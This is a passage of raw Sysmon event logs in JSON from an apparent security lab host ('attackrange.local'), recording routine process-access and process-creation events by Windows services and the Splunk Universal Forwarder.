C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.790","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12EF-5F25-0000-0010FC700A00}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7160,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.837\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E5-5F25-0000-00102F220A00}\r\nTargetProcessId: 2880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.837","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E5-5F25-0000-00102F220A00}","TargetProcessId":"2880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7161,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.837\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E5-5F25-0000-00102F220A00}\r\nTargetProcessId: 2880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.837","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E5-5F25-0000-00102F220A00}","TargetProcessId":"2880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7162,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.853\r\nProcessGuid: {E2A3D6B1-12EF-5F25-0000-0010BF740A00}\r\nProcessId: 1164\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.853","ProcessGuid":"{E2A3D6B1-12EF-5F25-0000-0010BF740A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7163,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.853\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-12EF-5F25-0000-0010BF740A00}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.853","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-12EF-5F25-0000-0010BF740A00}","TargetProcessId":"1164","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7164,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.853\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12EF-5F25-0000-0010BF740A00}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.853","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12EF-5F25-0000-0010BF740A00}","TargetProcessId":"1164","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7165,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7166,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7167,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
